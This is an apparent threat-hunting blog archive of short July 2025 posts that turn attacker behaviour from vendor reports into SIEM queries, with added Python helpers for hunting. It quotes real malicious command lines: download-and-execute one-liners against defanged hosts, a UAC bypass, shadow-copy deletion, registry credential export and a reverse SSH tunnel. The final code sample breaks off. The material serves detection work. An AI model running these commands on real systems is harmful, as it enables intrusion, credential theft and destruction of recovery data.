Posts

Showing posts from July, 2025

212. A Curious Case of Masquerading

Hello everyone! Masquerading (T1036) is a very common technique we see daily. Sometimes it's boring, sometimes it's not. But let's look at a curious case. Kaspersky released a report on how adversaries abuse GitHub and social media to deliver Cobalt Strike Beacons. The threat actors distributed RAR archives with multiple files inside. The victim should run an LNK file to start the infection process. The following command is executed:

%cd% /c echo F | xcopy /h /y %cd%\Требования\Требования %public%\Downloads\ & start %cd%\Требования & ren %public%\Downloads\Company.pdf nau.exe & ren %public%\Downloads\Requirements.pdf BugSplatRc64.dll & %public%\Downloads\nau.exe

And here we have a few detection opportunities. The first one is abusing xcopy to copy files to %PUBLIC%:

event_type: "processcreatewin" AND proc_file_path: "xcopy.exe" AND cmdline: "public"

The second is using ren to rename a PDF file into an EXE:

event_type: "proc...

211. That's How Stealers Defeat System Recovery

Hello everyone! What's the first thing you think about when you hear about defeating system recovery? Ransomware? Sure, but it's not the only case. And you can transform it into a detection opportunity! Elastic Security Labs presented a report on NOVABLIGHT, a NodeJS infostealer. It has a lot of features, but we're going to look at those related to defeating system recovery. For example, the stealer disables the Windows Recovery Environment (reagentc /disable) and deletes all Volume Shadow Copies (vssadmin delete shadows /all). And here we have two detection opportunities. Disabling the Windows Recovery Environment:

event_type: "processcreatewin" AND proc_file_path: "reagentc.exe" AND cmdline: "disable"

And deleting Volume Shadow Copies:

event_type: "processcreatewin" AND proc_file_path: "vssadmin.exe" AND cmdline: ("delete" AND "shadows")

See you tomorrow!
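The query syntax used in posts 212 and 211 above (and in the rest of these posts) is easy to get subtly wrong when you port it to your own SIEM, so here is an added example, not the blog's own tooling, of a small evaluator that parses that syntax and runs the queries over constructed process-creation and DNS events. The match semantics are assumptions: a quoted string is a case-insensitive substring match, a bare *wildcard* is a glob, a /regex/ is a full-match regex, and the `.keyword` suffix is treated as an index detail and stripped. The sample events are constructed, loosely modelled on the commands quoted in posts 212, 211, 205 and 196.

```python
"""Tiny evaluator for the hunting-query syntax used in these posts (example code added
for this page, not the blog's own tooling). Assumed semantics: quoted string = case-insensitive
substring, bare *wildcard* = glob, /regex/ = full match; AND/OR/NOT and parentheses work
both between field conditions and inside a field's value list."""
import fnmatch
import re

TOKEN_RE = re.compile(r'''\s*(?:("(?:[^"\\]|\\.)*")|(/(?:[^/\\]|\\.)*/)|([():])|([^\s():"]+))''')

def tokenize(query):
    tokens, pos, query = [], 0, query.strip()
    while pos < len(query):
        m = TOKEN_RE.match(query, pos)
        if not m:
            raise ValueError(f"bad token near {query[pos:pos + 12]!r}")
        pos, (quoted, regex, punct, bare) = m.end(), m.groups()
        if quoted:
            tokens.append(("STR", re.sub(r"\\(.)", r"\1", quoted[1:-1])))  # unescape \" and \\
        elif regex:
            tokens.append(("REGEX", regex[1:-1]))
        elif punct:
            tokens.append((punct, punct))
        else:  # AND/OR/NOT, a field name, or a bare *wildcard* value
            tokens.append((bare.upper() if bare.upper() in ("AND", "OR", "NOT") else "BARE", bare))
    return tokens

class Parser:
    def __init__(self, query):
        self.toks, self.i = tokenize(query), 0

    def peek(self, kind):
        return self.i < len(self.toks) and self.toks[self.i][0] == kind

    def starts_field(self, i):
        """Look past NOT and ( to see whether a new `field:` condition begins at i."""
        while i < len(self.toks) and self.toks[i][0] in ("NOT", "("):
            i += 1
        return i + 1 < len(self.toks) and self.toks[i][0] == "BARE" and self.toks[i + 1][0] == ":"

    def expr(self, leaf):
        node = self.term(leaf)
        while self.peek("OR") and not (leaf == self.literal and self.starts_field(self.i + 1)):
            self.i += 1
            node = (lambda l, r: lambda x: l(x) or r(x))(node, self.term(leaf))
        return node

    def term(self, leaf):
        node = self.factor(leaf)
        while self.peek("AND") and not (leaf == self.literal and self.starts_field(self.i + 1)):
            self.i += 1
            node = (lambda l, r: lambda x: l(x) and r(x))(node, self.factor(leaf))
        return node

    def factor(self, leaf):
        if self.peek("NOT"):
            self.i += 1
            inner = self.factor(leaf)
            return lambda x: not inner(x)
        if self.peek("("):
            self.i += 1
            inner = self.expr(leaf)
            self.i += 1  # the closing )
            return inner
        return leaf()

    def condition(self):
        """field: <value expression>; expr/term/factor are reused with literal() as the leaf,
        and an upcoming `field:` token ends the value list."""
        field = self.toks[self.i][1].removesuffix(".keyword")  # .keyword is an index detail
        self.i += 2  # skip the field name and the colon
        matcher = self.expr(self.literal)
        return lambda ev: matcher(str(ev.get(field, "")))  # a missing field never matches a literal

    def literal(self):
        kind, text = self.toks[self.i]
        self.i += 1
        if kind == "STR":
            return lambda s, n=text.lower(): n in s.lower()
        if kind == "REGEX":
            return lambda s, p=re.compile(text, re.I): p.fullmatch(s) is not None
        return lambda s, g=text.lower(): fnmatch.fnmatchcase(s.lower(), g)

def compile_query(query):
    p = Parser(query)
    return p.expr(p.condition)  # a predicate over one event dict

SAMPLE_EVENTS = [  # constructed telemetry, loosely modelled on posts 212, 211, 205 and 196
    {"event_type": "processcreatewin", "proc_file_path": "C:\\Windows\\System32\\xcopy.exe",
     "cmdline": "xcopy /h /y C:\\Users\\u\\Downloads\\Требования C:\\Users\\Public\\Downloads\\"},
    {"event_type": "processcreatewin", "proc_file_path": "C:\\Windows\\System32\\xcopy.exe",
     "cmdline": "xcopy /s C:\\build\\out C:\\temp\\out"},
    {"event_type": "processcreatewin", "proc_file_path": "C:\\Windows\\System32\\reagentc.exe", "cmdline": "reagentc /disable"},
    {"event_type": "processcreatewin", "proc_file_path": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin delete shadows /all /quiet"},
    {"event_type": "dnsreqwin", "proc_file_path": "C:\\Users\\u\\Downloads\\invoice.pif", "dns_rname": "router.huggingface.co"},
    {"event_type": "dnsreqwin", "proc_file_path": "C:\\Users\\u\\AppData\\Local\\Temp\\upd.exe",
     "dns_rname": "abc123.lambda-url.us-east-1.on.aws"},
]

def hunt(query, events=SAMPLE_EVENTS):
    """Indices of the events the query matches."""
    return [i for i, ev in enumerate(events) if compile_query(query)(ev)]
```

The value-level parser has to know when a value list ends and the next field begins (`cmdline: "a" AND proc_file_path: "b"`), which is what `starts_field` does; without that lookahead the second field name would be swallowed as a wildcard value. Substring matching on `proc_file_path` is deliberately loose, which is also how the blog's queries read (`"xcopy.exe"` against a full path).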

210. SHUYAL Stealer Disables Windows Task Manager as Part of Defense Evasion

Hello everyone! Threat actors have different views on Windows Task Manager. Some of them love it. For example, it can be used to dump LSASS and extract credentials. Others don't like it and try to disable it. For example, SHUYAL stealer. In general, it's quite a common stealer, but the behavior marker related to Task Manager seemed interesting to me. The malware modifies the following registry key to disable it:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr

And it provides a detection opportunity for us:

event_type: "registryvaluesetwin" AND reg_key_path: "DisableTaskMgr"

See you tomorrow!

209. Threat Actors Leverage ClickFix to Deploy Epsilon Red Ransomware

Hello everyone! Zero days without ClickFix. This time an adversary leveraged this technique to deploy Epsilon Red ransomware. In this case the "verification" process was a bit unusual. The victim needed to save the copied data as an HTA file, execute it, get the code and paste it into another window. First, the file executes a command to download and execute an Epsilon Red payload:

cmd /c cd /D %userprofile% && curl -s -o a.exe hxxp://155.94.155[.]227:2269/dw/vir.exe && a.exe

Next, it provides the "code":

cmd /c echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 && pause

And here we have an interesting detection opportunity:

event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("echo" AND "verificatification code")

See you tomorrow!

208. Hunting for ClickFix on macOS

Hello everyone! Do you think the ClickFix technique is used only to attack Windows-based systems? It's not true. Adversaries also use it to attack macOS! Hunt.io shared a report on a recent phishing campaign targeting macOS users. The adversary leveraged a fake CAPTCHA to trick victims into running Terminal commands. According to the report, the pasted command typically starts with:

echo 'BASE64_ENCODED_PAYLOAD' | base64 -d | bash

So, we can use it to build a query for our hunting mission:

event_type: "processcreatemac" AND cmdline: ("echo" AND "base64" AND "bash")

The command runs a hidden script that can steal crypto wallets, cookies, and sensitive files. See you tomorrow!

207. Dropping Elephant Misuses Pester to Execute Malicious PowerShell Commands

Hello everyone! Let's look at how adversaries leverage the following technique: System Script Proxy Execution (T1216). But we need an example, of course. And we have it! The Dropping Elephant campaign against Turkish defense contractors described by Arctic Wolf. Once again the threat actors used malicious LNK files. And this time they abused Pester.bat to execute malicious PowerShell commands:

"C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" ;powershell s''l''eep 1;$ProgressPreference = 'SilentlyContinue';$a='https:';$b='C:\Users\';$c='C:\Windows\';wg''et $a//expouav[.]org/download/fetch/list3/12717/view/0d5a0411-0a85-42cf-928c-dd9218019f3b -OutFile $b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf;s''ap''s "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf";wg''et $a//expouav[.]org/download/fetch/list7/40275/view/e49c7ae0...

206. That's How Adversaries Hide User Accounts from the Windows Login Screen

Hello everyone! Adversaries may use hidden accounts to access compromised infrastructure. Such accounts won't be displayed on the Welcome or login screen, but they can still be used, for example, to log in via Remote Desktop Protocol (RDP). To hide a user account from the Windows login screen, a threat actor may modify the registry. For example, here's how the Chaos ransomware gang does it:

cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist /v $user_account /t REG_DWORD /d 0 /f

And yes, we can hunt for similar registry modification events:

event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("add" AND "Winlogon\\SpecialAccounts\\Userlist")

See you tomorrow!

205. Adversaries Use an LLM to Generate Commands to be Executed on Compromised Systems

Hello everyone! Finally, an interesting case of LLM abuse! I'm talking about LameHug. The malware relies on the Hugging Face API to generate commands according to given prompts. For example, the malware used an LLM to generate reconnaissance and data theft commands. LameHug is distributed via phishing emails. The attached archives contain PIF files, for example. So, we can check for any PIF files resolving Hugging Face related domains:

event_type: "dnsreqwin" AND dns_rname: *huggingface* AND proc_file_path: *pif

It would also be a good idea to profile communications with the Hugging Face API to exclude known-good activity and be able to detect suspicious events. See you tomorrow!

204. Interlock Ransomware Gang Abuses AzCopy for Data Exfiltration

Hello everyone! Another legitimate tool abused by ransomware gangs: AzCopy. According to this cybersecurity advisory, the Interlock ransomware gang used the tool for data exfiltration. The tool allows the adversary to copy files from compromised systems to remote Azure storage. As the tool is legitimate, it's another great target for hunting, for example:

event_type: "processcreatewin" AND proc_file_path: "azcopy.exe"

Talking about Interlock, it's worth noting another tool in their arsenal we discussed earlier: Interlock RAT. See you tomorrow!

203. These are Staging Folders Used by APT41

Hello everyone! We already talked about staging folders and how to use such information for threat hunting. Let's look at another example! This time: APT41 (we track this cluster as Wanted Werewolf). According to this report by Kaspersky, the adversary leveraged the following folders to store the toolset:

c:\windows\tasks\
c:\programdata\
c:\programdata\usoshared\
c:\users\public\downloads\
c:\users\public\
c:\windows\help\help\
c:\users\public\videos\

Some are quite common, while others are great targets for your threat hunting mission, for example:

event_type: "processcreatewin" AND proc_file_path: ("windows\\tasks" OR "programdata\\usoshared" OR "windows\\help\\help" OR "users\\public\\videos")

See you tomorrow!

202. Adversaries Misuse a Script for Managing BitLocker to Deliver Fickle Stealer

Hello everyone! Stealers again! This time we're going to talk about Fickle Stealer and an interesting delivery method leveraged by the threat actors. So, the adversary used malicious LNK files to misuse a script for managing BitLocker (manage-bde.wsf) to download and execute a PowerShell script:

"C:\Windows\System32\manage-bde.wsf" & powershell -nop -w hidden -c iex(iwr hxxps://bitacid[.]net/payload/callback.ps1) & "

The script is executed via wscript.exe, so we can build our detection logic on suspicious command line parameters:

event_type: "processcreatewin" AND proc_file_path: "wscript.exe" AND cmdline: ("manage-bde" AND "powershell" AND "hidden")

See you tomorrow!

201. Adversaries Misuse Microsoft CAB File Extract Utility in Lumma Infection Chain

Hello everyone! Let's look at another LOLBIN commonly misused by adversaries. This time we're going to talk about Microsoft CAB File Extract Utility and Lumma Stealer, a very common modern threat. Despite the fact that Microsoft CAB File Extract Utility is meant to extract files with the .cab extension, any extension can be used, for example .mp4. That's what the adversary does (in fact, this behavior is related to the CypherIT crypter), for example:

extrac32 /Y Ultimate.ppt *.*
extrac32 /Y Championships.sldm *.*
extrac32 /Y Worm.potm *.*
extrac32 /Y Stainless.mid *.*
extrac32 /Y Combinations.psd *.*

So, from a detection and hunting perspective, we can search for extrac32 execution events that don't have .cab files in the command line:

event_type: "processcreatewin" AND proc_file_path: "extrac32.exe" AND NOT cmdline: *cab*

See you tomorrow!

200. Threat Actors Eliminate Competitors from Compromised Systems

Hello everyone! It's not a secret that in some cases a network may already be compromised, and in some cases by threat actors with the same goal. What are the new unwanted guests going to do? Yes, eliminate the competitors! Today we're going to talk about another very common threat: miners. One may say it's not a real threat, but believe me, I saw cases where the whole enterprise was disrupted due to such an infection. So, let's look at Kinsing (we track this activity cluster as Resourceful Wolf). It abuses pkill to terminate a list of processes related to other cryptominers, for example:

pkill -f .git/kthreaddw
pkill -f 80.211.206.105
pkill -f 207.38.87.6
pkill -f p8444
pkill -f supportxmr
pkill -f monero
pkill -f kthreaddi
pkill -f srv00
pkill -f /tmp/.javae/javae
pkill -f .javae
pkill -f .syna
pkill -f xmm
pkill -f solr.sh
pkill -f /tmp/.solr/solrd
pkill -f /tmp/javac
pkill -f /tmp/.go.sh
pkill -f /tmp/.x/agetty
pkill -f /tmp/.x/kworker
pkill -f c3pool
pkill -f /tmp/.X11...

199. That's How Katz Stealer Extracts Authentication Material from Registry

Hello everyone! Stealers. I'm sure you see this threat every day! And it's EXTREMELY noisy, as it extracts lots of sensitive data from a compromised system. Let's look at another example of how adversaries leverage the following technique: Unsecured Credentials: Credentials in Registry (T1552.002). So, we're going to look at Katz Stealer. Here's how it abuses reg.exe to extract authentication material for FFFTP and WinSCP:

cmd.exe /c reg export "HKCU\Software\Sota\FFFTP" "%LOCALAPPDATA%\FFFTP_registry.reg" /y
cmd.exe /c reg export "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions" "%LOCALAPPDATA%\WinSCP_registry.reg" /y

As always, we can transform it into a detection query:

event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("export" AND ("FFFTP" OR "WinSCP"))

See you tomorrow!

198. Ransomware Gangs Uninstall Two-Factor Authentication Apps

Hello everyone! More and more organizations use multi-factor authentication. And threat actors don't like it! For example, ransomware gangs. Let's look into this Cisco Talos report. The adversary leveraged a simple yet effective technique: they just uninstalled Duo from the compromised host:

C:\WINDOWS\system32\cmd.EXE, /c, wmic, product, where, name=Duo Authentication for Windows Logon x64, call, uninstall, /nointeractive:

And yes, this is another interesting behavior to hunt for:

event_type: "processcreatewin" AND cmdline: ("duo authentication" AND "uninstall")

Of course, you can experiment with other two-factor authentication applications. See you tomorrow!

197. Hunting for C2 Request Patterns

Hello everyone! Let's keep talking about C2 communications. And this time we'll look at an activity cluster we track as Rainbow Hyena (it's also known as Head Mare). Let's look at the following part of the report:

After collecting initial information about the compromised system, the backdoor establishes a connection with the C2 server. The communication is carried out over HTTP, using GET and POST requests. The malware generates a GET request and accesses a URL in the following format: 91.239.148[.]21/poll?id=&hostname=&domain=

As you can see, there's a certain pattern we can use for hunting even if we don't know the IP address of the server. Let's look at another example. It's the same group, but the pattern is different:

hxxp://195.58.54[.]39:80/connect
hxxp://195.58.54[.]39/check
hxxp://195.58.54[.]39/command
hxxp://195.58.54[.]39/init

And this is another thing you should notice, document and use for threat hunting, both internal and external. Se...
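The point of post 197 is that the request shape survives a change of server, so the hunt should key on the path and the parameter names rather than the IP. As an added example (not the blog's own tooling), the code below normalises URLs from proxy-log lines into host-independent templates and reports source/destination pairs whose templates cover one of the two Rainbow Hyena patterns quoted above. The log-line format, the rule names and the sample lines (documentation-range IPs) are constructed for the example.

```python
"""Normalise URLs into host-independent request templates and match them against
documented C2 request patterns. Example code added for this page, not the blog's
tooling; the proxy-log format, rule names and sample lines are constructed."""
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

def url_template(url):
    """'http://198.51.100.1/poll?id=x&hostname=y' -> '/poll?id=&hostname='.
    Host, port and parameter values are dropped; the path and the parameter names
    (in order) are kept, since those survive a change of server."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    names = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    return parts.path + ("?" + "&".join(n + "=" for n in names) if names else "")

# Patterns taken from the two Rainbow Hyena examples in the post. A pair is reported
# when the templates seen from one source to one host cover every template of a pattern.
C2_PATTERNS = {
    "rainbow_hyena_poll": {"/poll?id=&hostname=&domain="},
    "rainbow_hyena_endpoints": {"/connect", "/check", "/command", "/init"},
}

SAMPLE_PROXY_LOG = [  # constructed: "<timestamp> <src_ip> <method> <url>", documentation IPs
    "2025-07-01T10:00:01 10.0.0.5 GET http://203.0.113.10/poll?id=7f3a&hostname=WS01&domain=CORP",
    "2025-07-01T10:00:31 10.0.0.5 GET http://203.0.113.10/poll?id=7f3a&hostname=WS01&domain=CORP",
    "2025-07-01T10:01:00 10.0.0.7 GET http://203.0.113.20:80/connect",
    "2025-07-01T10:01:02 10.0.0.7 GET http://203.0.113.20/check",
    "2025-07-01T10:01:03 10.0.0.7 GET http://203.0.113.20/init",
    "2025-07-01T10:01:05 10.0.0.7 POST http://203.0.113.20/command",
    "2025-07-01T10:02:00 10.0.0.9 GET http://www.example.com/poll?id=1",
    "2025-07-01T10:02:10 10.0.0.9 GET http://www.example.com/check",
]

def hunt_c2_patterns(log_lines=SAMPLE_PROXY_LOG):
    """Return (src_ip, host, pattern_name) for every source/host pair whose observed
    request templates contain a full known pattern."""
    seen = defaultdict(set)
    for line in log_lines:
        _ts, src, _method, url = line.split()
        host = urlsplit(url if "://" in url else "http://" + url).hostname  # port dropped
        seen[(src, host)].add(url_template(url))
    return [(src, host, name)
            for (src, host), templates in sorted(seen.items())
            for name, required in C2_PATTERNS.items()
            if required <= templates]
```

Grouping by `hostname` rather than `netloc` matters for the second pattern, where the post shows `:80` on one request and no port on the others; keeping the parameter order in the template is what distinguishes the `/poll` beacon from a generic polling endpoint with the same names in a different order.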

196. Hunting for AWS Lambda URLs Abuse

Hello everyone! Adversaries always experiment with C2 channels to evade defenses. And they often abuse legitimate services, as you know. Let's look at another interesting example. Unit42 has published a report on activity cluster CL-STA-1020. The adversary leveraged a quite common technique, DLL sideloading, to deploy the HazyBeacon backdoor. But at the same time, the threat actors chose a very interesting C2 channel: AWS Lambda URLs. Of course, these URLs may be a part of absolutely legitimate activity, but we can still hunt for suspicious processes communicating with them, excluding known good, of course. For example:

dns_rname.keyword:/.*lambda-url.*/ AND NOT proc_file_path: ("svchost.exe" OR "networkservice.exe" OR "msmpeng.exe")

The exclusion list may be different; it depends on your infrastructure! See you tomorrow!

195. Hunting for Interlock RAT PHP Based Variant

Hello everyone! The DFIR Report has published a report on Interlock RAT. The adversary used KongTuke and the FileFix technique to deliver it to the target system. The victim copies and pastes the following command:

"powershell.exe" -ep Bypass -w H -c "schtasks /delete /tn Updater /f; $w=New-Object System.Net.WebClient ; $w.Headers.Add(\"User-Agent\", \"PowerShell\") ; $w.DownloadString(\"hXXp://deadly-programming-attorneys-our[.]trycloudflare[.]com\") | iex"

Nothing interesting, right? But it spawns an interesting command abusing php.exe:

"C:\Users\REDACTED\AppData\Roaming\php\php.exe" -d extension=zip -d extension_dir=ext C:\Users\\AppData\Roaming\php\wefs.cfg 1

Here we can search for PowerShell spawning php.exe from uncommon locations:

event_type: "processcreatewin" AND proc_p_file_path: "powershell.exe" AND proc_file_path: ("appdata" AND "php.exe")

The adversary used Interlock RAT to ...

194. Can Darknet Forums Help Us with Threat Hunting?

Hello everyone! I'm sure many of you consume or even produce intelligence related to the Darknet. Initial access brokers, sold databases, stealer logs for sale... But what about threat hunting? Can we get valuable intelligence and transform it into a hypothesis for threat hunting? Yes, we can! Let's look at an example. Recently a threat actor with the moniker "tainted_l0ve" advertised a new ClickFix delivery method. My attention was caught by the following part: "on delivery, command is automatically deleted from user "Run" history". If you have ever done digital forensics, you must know that RunMRU (Most Recently Used) is a Windows registry key that stores a list of the last 26 commands entered in the Run dialog (Win + R). And it means the tool most likely clears this key, so we can use it for hunting:

event_type: "registryobjdelete" AND reg_key_path: "runmru"

See you tomorrow!

193. Let's Look at How Modern Ransomware Gangs Collect and Exfiltrate Data

Hello everyone! The modern ransomware attack lifecycle almost always includes a data collection and exfiltration stage. Some gangs don't even deploy ransomware; they just exfiltrate sensitive data and use it for extortion. What's more, the threat actors often use absolutely legitimate tools! Let's look at an example: SafePay ransomware. According to the report, the adversary leveraged WinRAR for collection:

WinRAR.exe a -v5g -ed -r -tn1000d -m0 -mt5 -x*.rar -x*.JPEG -x*.RAW -x*.PSD -x*.TIFF -x*.BMP -x*.GIF -x*.JPG -x*.MOV -x*.pst -x*.FIT -x*.FIL -x*.mp4 -x*.avi -x*.mov -x*.mdb -x*.iso -x*.exe -x*.dll -x*.bak -x*.msg -x*.png -x*.zip -x*.ai -x*.7z -x*.DPM -x*.log -x*.dxf -x*.insp -x*.upd -x*.db -x*.dwg -x*.nc1 -x*.metadata -x*.dg -x*.inp -x*.dat -x*.TIFF -x*.tiger -x*.pcp -x*.rvt -x*.rws -x*.nwc -x*.tif -x*.frx -x*.dyf -x*.rcs -x*.diff C:\[redacted].rar \\[redacted]\C$\Users\

It's interesting that in this case the adversary decided to exclude uninteresting files, for examp...
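A command line like the one in post 193 carries a lot of structure: the volume size, the recursion flag, the time filter, the long exclusion list, the archive path and the UNC source. As an added example (not the blog's own tooling), here is a parser that breaks a WinRAR add command into those parts and derives collection-stage indicator tags a hunter could attach to process-creation events. The switch meanings (-v volume size, -r recurse, -x exclude mask, -tn "newer than") follow WinRAR's command-line documentation; the indicator names and the benign sample are my own, and the malicious sample is a shortened copy of the post's command line with its redactions kept.

```python
"""Parse a WinRAR 'a' (add) command line into its parts and flag collection-stage
indicators. Example code added for this page, not the blog's tooling. Switch meanings
follow WinRAR's command-line documentation; the indicator names are my own."""
import re
import shlex

ADMIN_SHARE_RE = re.compile(r"^\\\\[^\\]+\\[A-Za-z]\$", re.I)  # \\host\C$ and friends

def parse_winrar(cmdline):
    # posix=False keeps Windows backslashes literal; surrounding quotes are stripped by hand
    argv = [a.strip('"') for a in shlex.split(cmdline, posix=False)]
    info = {"exe": argv[0], "command": argv[1], "switches": [], "exclude": [],
            "volume": None, "newer_than": None, "archive": None, "sources": []}
    positional = []
    for arg in argv[2:]:
        if arg.startswith("-"):
            info["switches"].append(arg)
            if arg.startswith("-x"):
                info["exclude"].append(arg[2:])      # -x<mask>: exclude matching files
            elif arg.startswith("-v"):
                info["volume"] = arg[2:]             # -v<size>: split into volumes
            elif arg.startswith("-tn"):
                info["newer_than"] = arg[3:]         # -tn<time>: only files newer than <time>
        else:
            positional.append(arg)
    if positional:  # WinRAR syntax: <command> <switches> <archive> <files...>
        info["archive"], info["sources"] = positional[0], positional[1:]
    return info

def collection_indicators(info):
    """Heuristics for WinRAR process-creation events; each hit is a string tag."""
    found = []
    if info["command"].lower() == "a" and info["volume"]:
        found.append("split_volumes")               # chunked archives, ready for exfil
    if any(ADMIN_SHARE_RE.match(s) for s in info["sources"]):
        found.append("admin_share_source")          # collecting straight from \\host\C$
    if any(re.search(r"\\Users\\?$", s, re.I) for s in info["sources"]):
        found.append("whole_user_profiles")         # the entire Users tree, not one folder
    if "-r" in info["switches"] and len(info["exclude"]) >= 10:
        found.append("exclusion_based_sweep")       # "take everything except noisy types"
    if {e.lower().lstrip("*.") for e in info["exclude"]} & {"exe", "dll", "log", "bak"}:
        found.append("excludes_binaries_and_logs")
    if info["newer_than"]:
        found.append("time_filtered")               # only recent files are worth stealing
    return found

SAFEPAY_CMDLINE = (  # shortened from the post's command line, redacted parts kept as-is
    "WinRAR.exe a -v5g -ed -r -tn1000d -m0 -mt5 -x*.rar -x*.JPEG -x*.RAW -x*.PSD -x*.TIFF "
    "-x*.BMP -x*.GIF -x*.JPG -x*.MOV -x*.pst -x*.mp4 -x*.exe -x*.dll -x*.log "
    "C:\\[redacted].rar \\\\[redacted]\\C$\\Users\\"
)
BENIGN_CMDLINE = ('"C:\\Program Files\\WinRAR\\WinRAR.exe" a -r C:\\backup\\docs.rar '
                  "C:\\Users\\alice\\Documents\\report.docx")  # constructed
```

The tags are meant to be combined rather than alerted on individually: `-r` with a dozen exclusions is how a backup job looks too, but a split-volume, time-filtered archive of `\\host\C$\Users\` is the collection pattern the post describes.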

192. I'm Not Sure If I Want to Masquerade It

Hello everyone! As it's Friday, let's look at a funny case, at least in my opinion. And it's one more time about masquerading. The case itself is related to exploiting public-facing applications and deploying coinminers. Nothing special. But there are a few interesting behaviors! The adversary downloads NetCat from a remote server:

(New-Object Net.WebClient).DownloadFile('hXXp://212.78.4[.]241:8081/docs/nc.exe', 'C:\programdata\userinit.exe')

As you can see, the threat actors masqueraded NetCat to look like a legitimate process, but at the same time copied and renamed cmd.exe:

cmd c/ copy C:\Windows\System32\cmd.exe C:\ProgramData\c.exe

So, once again we are dealing with renamed command and scripting interpreters:

event_type: "processcreatewin" AND proc_file_originalfilename: "cmd.exe" AND NOT proc_file_name: "cmd.exe"

And also command and scripting interpreters in uncommon locations:

event_type: "processcreatewin"...

191. Some Threat Actors Just Want to Be Detected

Hello everyone! I'm sure you have seen cases where adversaries really wanted the defenders to catch them. Yes, in some cases they may call the payload malware.exe or... Let's look at the example I spotted today: you got it right, the filename is payload.exe. That's it. So, why not hunt for such suspicious filenames? For example:

event_type: "processcreatewin" AND proc_file_path: "payload"

Another interesting example: PDB paths. In some cases, they may be REALLY suspicious, for example:

Y:\Hack\backdoor\3-exe-attack\temp\UAC_Elevated\win32\UAC_Elevated.pdb

So, if your EDR solution supports collecting PDB paths, you can also use them for detection and hunting:

event_type: "processcreatewin" AND proc_file_pdb_path: ("payload" OR "hack" OR "backdoor" OR "attack" OR "bypass" OR "dropper" OR "exploit" OR "keylog" OR "trojan" OR "spy")

See you tomorrow!

190. Does Renaming Legitimate Binaries Really Mask Them?

Hello everyone! Today I want to look at another stealer: NordDragonScan. Once again, the adversary uses a malicious LNK file to download an HTA, a very common behavior. But that's not the thing that caught my attention; it's the following: "The malicious HTA file copies the legitimate PowerShell.exe binary to the path “C:\Users\Public\Documents\install.exe” to mask itself". So, here we have a renamed PowerShell.exe binary, and also a quite suspicious staging folder. Looks like the adversary made things even noisier! We already talked about renamed system binaries, and here's another example:

event_type: "processcreatewin" AND proc_file_originalfilename: "powershell.exe" AND NOT proc_file_name: "powershell.exe"

And also another suspicious staging folder:

event_type: "processcreatewin" AND proc_file_path: "Public\\Documents"

See you tomorrow!

189. Adversaries Abuse ComputerDefaults.exe to Bypass the UAC

Hello everyone! There are quite a few well-known ways to bypass User Account Control (UAC). Some are often used in the wild, some are not. Let's look at a recent example from a Kaspersky report on Batavia spyware. The adversary abused ComputerDefaults.exe to bypass UAC. To do it, the threat actor modified two registry keys using reg.exe:

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f /ve /t REG_SZ /d "%temp%\windowsmsg.exe <arg>"

It means we can hunt for related registry key modification events:

event_type: "registryvaluesetwin" AND reg_key_path: "ms-settings\\shell\\open\\command"

Also, check for suspicious processes spawned as child processes of ComputerDefaults.exe:

event_type: "processcreatewin" AND proc_p_file_path: "computerdefaults.exe"

See you tomorrow!

188. Adversaries Abuse Console Window Host More and More Often

Hello everyone! We already talked about Console Window Host (conhost.exe) abuse. Usually threat actors use it with the "--headless" flag to hide the window from the user upon execution. Unit42 conducted research on malicious LNK files, and guess what? Yes, Console Window Host is among the most often used system targets:

powershell.exe
cmd.exe
rundll32.exe
conhost.exe
wscript.exe
forfiles.exe
mshta.exe

What does it mean? It's definitely worth a hunting query:

event_type: "processcreatewin" AND proc_file_name: "conhost.exe" AND cmdline: "headless"

See you tomorrow!

187. Scattered Spider Started to Abuse Teleport

Hello everyone! If you checked the report I shared yesterday, you should have noticed another interesting legitimate tool abused by Scattered Spider: Teleport. The adversary installed it on compromised servers to establish a persistent remote command-and-control (C2) channel. We can start by hunting for downloads of Teleport binaries, for example:

event_type: "processcreatenix" AND proc_file_name: "curl" AND cmdline: "teleport.dev"

Also, you may look for Teleport configuration file modification events:

event_type: "filewrite" AND file_path: "teleport.yaml"

See you tomorrow!

186. Pinggy: Another Tunneling Solution Abused by Adversaries

Hello everyone! Have you read the recent CrowdStrike report on SCATTERED SPIDER activity? If not, make sure you do! It contains lots of valuable information on the adversary's tactics, techniques and procedures. One of them is abusing Pinggy, another privacy-focused tunneling solution. It's interesting that threat actors don't even have to drop its binary on the compromised system; they can just use ssh, for example:

ssh -p 443 -R0:127.0.0.1:3389 -o StrictHostKeyChecking=no -o ServerAliveInterval=30 4FohZ817ZPe+tcp@a.pinggy.io

So, the first thing to hunt for is "pinggy" in the command line:

event_type: "processcreatewin" AND cmdline: "pinggy"

Another opportunity is hunting for Pinggy-related domains:

event_type: "dnsreq" AND dns_rname: ("pinggy.io" OR "pinggy.link")

See you tomorrow!
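The substring hunt for "pinggy" in post 186 is the quick win; the ssh command line itself also tells you what is being tunnelled (a reverse forward of local 3389) and how (port 443, host key checking off). As an added example (not the blog's own tooling), the parser below pulls `-p`, `-R`, `-o` and the destination out of an ssh command line and turns them into indicator tags. The Pinggy domains come from the post; the sensitive-port table, the indicator names and the benign sample are my own assumptions, and the option list is OpenSSH ssh(1)'s set of options that take an argument.

```python
"""Parse an ssh command line, extract reverse forwards (-R) and the destination, and flag
tunnelling indicators. Example code added for this page, not the blog's tooling. The
tunnel-service domains come from the post; the port table and indicator names are mine."""
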